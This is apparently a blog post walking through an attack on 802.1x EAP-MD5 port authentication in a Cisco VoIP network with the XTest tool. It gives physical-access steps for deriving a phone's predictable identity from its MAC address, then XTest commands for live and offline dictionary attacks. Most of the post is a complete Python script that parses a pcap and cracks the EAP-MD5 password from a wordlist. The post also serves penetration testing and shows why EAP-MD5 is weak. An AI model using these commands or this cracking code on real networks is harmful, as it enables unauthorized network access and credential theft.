Breaking into 802.1x EAP-MD5 Port based authentication in Wired VoIP Network – II

Now that we have simulated the production network, we can proceed with the real attack. I will explain the password-breaking procedure using a freely available tool. Read more about setting up 802.1x port-based authentication in a wired VoIP network here.
Sipera Viper Lab has released a new tool, XTest, for automating the password-breaking procedure against 802.1x EAP-MD5 port-based authentication.
The tool is released under the GPLv3 license and has some cool features:

  • 802.1x supplicant: XTest can act as a supplicant and test a username and password against an 802.1x authenticator (Ethernet switch); it also supports re-authentication.
  • Offline pcap dictionary attack: if you capture a valid 802.1x authentication sequence into a pcap file, XTest will run a dictionary attack against the pcap using a supplied wordlist. XTest will recover the password from the pcap if the dictionary file contains the valid password.
  • Shared-hub unauthorized access: using a shared hub, XTest can ride on the successful authentication of a valid 802.1x supplicant to gain unauthorized access to the network.

Here are the steps an attacker could take to gain unauthorized access to the physical network.

Assumption: the attacker is already on the victim's premises and has physical access to phones in the lobby or reception area.
1) The attacker reads the phone model and MAC address off the phone to learn the username, then unplugs the phone from the switch port.
2) As we already know, Cisco phones use a hardcoded, predictable string as the 802.1x identity. For a Cisco 7961G phone the username is CP-7961G-SEP<MacAddress>.
3) Using XTest, the attacker can try to get access by combining the learned username with guessed passwords:
bughira@bt:~/xtest-1.0# ./xtest -u <UserName> -p <test-Pwd>
The above command tries to complete the authentication sequence with the given username and password. Instead of testing passwords one by one, you can use XTest's live dictionary attack feature:
just feed the tool a good password dictionary and let it try every entry against the switch.
bughira@bt:~/xtest-1.0# ./xtest -u <UserName> -w <DictionaryFile>

4) XTest also has an offline dictionary attack feature: supply a pcap file containing a successful EAP-MD5 exchange and the tool retrieves the username, EAP identifier and challenge from the capture and breaks the password against the wordlist. This works because EAP-MD5 sends both the challenge and the response in the clear and the response is simply MD5(identifier || password || challenge), so every candidate password can be verified with a single hash and no further interaction with the switch.
bughira@bt:~/xtest-1.0# ./xtest -c EAP_MD5_SUCCESS.pcap -w <DictionaryFile>

5) XTest has a built-in 802.1x supplicant and can be used to perform a re-authentication attack, as shown below.
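To make the offline attack of step 4 concrete, here is an added example (my own code, not XTest's and not from the original post) that does the same job as "xtest -c <pcap> -w <wordlist>": it reads a libpcap file, picks out the EAPOL EAP-Packet frames, extracts the identity, EAP identifier, MD5 challenge and response of an exchange that ended in EAP-Success, and tests each wordlist entry against the RFC 3748 formula MD5(identifier || password || challenge). The capture is constructed inline (the CP-7961G-SEP<MAC> identity format is the one the post describes; the MAC, password, challenge and wordlist are made up), so the script runs offline; point eap_packets_from_pcap at a real capture to use it for real.

```python
import hashlib
import struct

ETHERTYPE_EAPOL = 0x888E
EAPOL_EAP_PACKET = 0                      # EAPOL type 0 carries an EAP packet
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS = 1, 2, 3
EAP_TYPE_IDENTITY, EAP_TYPE_MD5 = 1, 4


def eap_md5_response(identifier, password, challenge):
    """RFC 3748 5.4 / RFC 1994: Response-Value = MD5(Identifier || Secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


# --- constructed sample capture (assumption: not a real phone/switch trace) --------
def eapol_frame(code, identifier, body):
    """Ethernet(0x888E) / EAPOL(v2, EAP-Packet) / EAP header + body."""
    eap = struct.pack("!BBH", code, identifier, 4 + len(body)) + body
    eapol = struct.pack("!BBH", 2, EAPOL_EAP_PACKET, len(eap)) + eap
    dst = bytes.fromhex("0180c2000003")   # PAE group address
    src = bytes.fromhex("001122334455")   # made-up phone MAC
    return dst + src + struct.pack("!H", ETHERTYPE_EAPOL) + eapol


def pcap_bytes(frames):
    """Minimal libpcap file: little-endian global header, link type 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(frame), len(frame)) + frame
    return out


def build_sample_capture(identity, password, challenge, identifier=0x2A):
    """Identity request/response, MD5 challenge/response, then EAP-Success."""
    frames = [
        eapol_frame(EAP_REQUEST, 1, bytes([EAP_TYPE_IDENTITY])),
        eapol_frame(EAP_RESPONSE, 1, bytes([EAP_TYPE_IDENTITY]) + identity.encode()),
        eapol_frame(EAP_REQUEST, identifier,
                    bytes([EAP_TYPE_MD5, len(challenge)]) + challenge + b"switch"),
        eapol_frame(EAP_RESPONSE, identifier,
                    bytes([EAP_TYPE_MD5, 16])
                    + eap_md5_response(identifier, password.encode(), challenge)
                    + identity.encode()),
        eapol_frame(EAP_SUCCESS, identifier, b""),
    ]
    return pcap_bytes(frames)


# --- the offline attack -----------------------------------------------------------
def eap_packets_from_pcap(data):
    """Return [(code, identifier, eap_body)] for every EAPOL EAP-Packet frame in a pcap."""
    magic = struct.unpack("<I", data[:4])[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    off, pkts = 24, []
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 22 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_EAPOL:
            continue
        eapol_type, eapol_len = frame[15], struct.unpack("!H", frame[16:18])[0]
        if eapol_type != EAPOL_EAP_PACKET:
            continue                      # EAPOL-Start/Logoff/Key carry no EAP
        eap = frame[18:18 + eapol_len]
        code, ident, length = struct.unpack("!BBH", eap[:4])
        pkts.append((code, ident, eap[4:length]))
    return pkts


def extract_md5_handshake(pkts):
    """(identity, identifier, challenge, response) of an exchange ending in EAP-Success, else None."""
    identity = ident = challenge = response = None
    for code, pid, body in pkts:
        if code == EAP_SUCCESS:
            if challenge is not None and response is not None:
                return identity, ident, challenge, response
            continue
        if not body:
            continue
        eap_type = body[0]
        if code == EAP_RESPONSE and eap_type == EAP_TYPE_IDENTITY:
            identity = body[1:].decode("ascii", "replace")
        elif code == EAP_REQUEST and eap_type == EAP_TYPE_MD5:
            # Value-Size byte precedes the challenge; a new challenge voids any old response
            ident, challenge, response = pid, body[2:2 + body[1]], None
        elif code == EAP_RESPONSE and eap_type == EAP_TYPE_MD5 and pid == ident:
            response = body[2:2 + body[1]]
    return None


def crack(handshake, wordlist):
    """Dictionary attack: one MD5 per candidate, no interaction with the switch."""
    _identity, ident, challenge, response = handshake
    for candidate in wordlist:
        if eap_md5_response(ident, candidate.encode(), challenge) == response:
            return candidate
    return None


SAMPLE_IDENTITY = "CP-7961G-SEP001122334455"       # constructed identity in the post's format
SAMPLE_PCAP = build_sample_capture(SAMPLE_IDENTITY, "phone-pw-2010", bytes(range(16)))
WORDLIST = ["password", "cisco", "Cisco123", "phone-pw-2010", "letmein"]  # constructed


def run_offline_attack(pcap_data=SAMPLE_PCAP, wordlist=WORDLIST):
    """Return (identity, recovered_password_or_None), or None if no completed exchange was found."""
    handshake = extract_md5_handshake(eap_packets_from_pcap(pcap_data))
    if handshake is None:
        return None
    return handshake[0], crack(handshake, wordlist)


if __name__ == "__main__":
    print(run_offline_attack())
```

The parser deliberately requires an EAP-Success after a challenge/response pair: a capture of a failed attempt still yields a hashable response, but a password that matches it is one the switch rejected, so cracking it tells you nothing. The cost model is the whole point of the post: with the challenge and response in hand, each candidate is one MD5, so a large wordlist goes through in seconds with no lockout and no traffic on the wire.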

“XTest makes sure that no one can anymore completely rely on EAP-MD5 port based authentication schemes.”

Download XTest here.
Happy Hunting..